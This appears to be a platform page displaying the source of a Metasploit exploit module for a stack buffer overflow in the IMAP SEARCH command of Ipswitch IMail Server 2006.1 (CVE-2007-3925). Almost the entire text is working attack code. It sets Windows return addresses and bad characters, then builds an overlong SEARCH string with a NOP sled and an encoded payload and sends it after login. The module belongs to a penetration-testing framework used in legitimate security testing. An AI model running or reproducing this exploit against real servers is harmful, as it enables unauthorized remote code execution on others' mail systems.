Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/imap/ipswitch_search.rb
Views: 11783
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = AverageRanking78include Msf::Exploit::Remote::Imap910def initialize(info = {})11super(update_info(info,12'Name' => 'Ipswitch IMail IMAP SEARCH Buffer Overflow',13'Description' => %q{14This module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH15verb. By sending an overly long string, an attacker can overwrite the16buffer and control program execution.17In order for this module to be successful, the IMAP user must have at least one18message.19},20'Author' => [ 'MC' ],21'License' => MSF_LICENSE,22'References' =>23[24[ 'CVE', '2007-3925' ],25[ 'OSVDB', '36219' ],26[ 'BID', '24962' ],27],28'Privileged' => true,29'DefaultOptions' =>30{31'EXITFUNC' => 'thread',32},33'Payload' =>34{35'Space' => 400,36'BadChars' => "\x00\x0a\x0d\x20\x0b\x09\x0c",37'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",38},39'Platform' => 'win',40'Targets' =>41[42[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77f81be3 } ],43[ 'Windows 2003 SP0 English', { 'Ret' => 0x77c5cee8 } ]44],45'DefaultTarget' => 0,46'DisclosureDate' => '2007-07-18'))47end4849def exploit5051sploit = "a002 SEARCH BEFORE " + "<" + rand_text_english(87)52sploit << [target.ret].pack('V') + make_nops(20) + payload.encoded + ">"5354info = connect_login5556if (info == true)57print_status("Trying target #{target.name}...")58sock.put("a001 SELECT INBOX\r\n")59sock.get_once(-1, 3)60sock.put(sploit + "\r\n")61else62print_status("Not falling through with exploit")63end6465handler66disconnect6768end69end707172